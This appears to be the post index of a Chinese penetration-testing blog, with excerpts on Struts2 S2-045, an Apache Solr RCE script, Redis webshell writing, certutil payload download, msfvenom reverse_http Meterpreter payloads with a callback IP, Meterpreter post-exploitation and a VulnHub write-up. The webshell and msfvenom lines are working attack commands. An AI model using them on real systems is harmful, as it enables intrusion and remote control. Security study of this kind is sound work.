struts2漏洞分析之S2-045 发表于 2020-03-14 | 分类于 web安全 , 代码审计 简介影响版本:2.3.31-2.3.5 2.5-2.5.10.1 漏洞原因:在处理上传文件的方法中,content-type中存在payload,处理错误并捕捉了异常信息(里面带有payload),后又OGNL解析 调试分析在获取action mapper前会对HttpServletReques ... 阅读全文 »
Apache_Solr_RCE利用脚本 发表于 2019-11-09 | 分类于 渗透测试 Apache_Solr_RCE_via_Velocity最近Apache Solr爆出了一个RCE 0day漏洞,利用前提是存在未授权访问。原作者给出的POC如下:12345678910111213141516171819202122232425262728293031323334353637383 ... 阅读全文 »
渗透测试笔记6-redis写shell 发表于 2019-10-03 | 分类于 渗透测试 通过备份文件写shell1234567CONFIG SET dir /var/www/html CONGIG SET dbfilename shell.php SET shell "<?php system($_GET['cmd']);?>" ... 阅读全文 »
渗透测试笔记5-一句话下载payload 发表于 2019-10-03 | 分类于 渗透测试 certutilCertutil.exe是一个命令行程序,作为证书服务的一部分安装。您可以使用Certutil.exe转储 和显示证书颁发机构(CA)配置信息,配置证书服务,备份和还原CA组件以及验证证书, 密钥对和证书链 下载默认下载后为bin文件,但不影响执行certutil.exe -urlc ... 阅读全文 »
渗透测试笔记4-msfvenom命令记录 发表于 2019-10-03 | 分类于 渗透测试 有效命令msfvenom -p windows/x64/meterpreter/reverse_http lhost=114.116.33.191 lport=8888 -f exe>test_3.exemsfvenom -p windows/meterpreter/reverse_http ... 阅读全文 »
渗透测试笔记3-内网存活主机扫描 发表于 2019-10-03 | 分类于 渗透测试 基于UDP简介UDP(User Datagram Protocol)是一种无连接的协议,在第四层-传输层,处于IP协议的 上一层。UDP有不提供数据包分组、组装和不能对数据包进行排序的缺点,也就是说,当报 文发送之后,是无法得知其是否安全完整到达的。 UDP特性:1.UDP 缺乏可靠性。UDP 本身 ... 阅读全文 »
渗透测试笔记2-MSF常用模块记录 发表于 2019-10-03 | 分类于 渗透测试 运行自动化脚本 msfconsole -r auto.rc 检测是否为虚拟机 post/windows/gather/checkvm 获取磁盘信息 windows/gather/forensics/enum_drives 补丁信息 run post/windows/gather/ ... 阅读全文 »
渗透测试笔记1-Meterpreter后渗透 发表于 2019-10-03 | 分类于 渗透测试 基本命令background将meterpreter终端隐藏在后台,msf可执行其它任务. sessions查看已获取的会话,sessions -i 与某对话交互 quit关闭当前会话,返回msf终端 shell获取系统的控制台shell reboot重新启动受害人的计算机 irb与ruby终端交互 ... 阅读全文 »
DeDecms v5.7 sp2 CRSF+文件操作 前台getshell 发表于 2019-05-12 | 分类于 web安全 , 代码审计 在plus/search.php中:123456789101112131415161718192021222324252627282930313233if(empty($typeid)){ $typenameCacheFile = DEDEDATA.'/cache/type ... 阅读全文 »
VulnHub-Acid Server Writeup 发表于 2019-04-26 | 分类于 渗透测试 目标Escalate the privileges to root and capture the flag. Once anyone able to beat the machine then please let me know. 信息收集端口扫描 nmap -p 1-65535 -T4 -A ... 阅读全文 »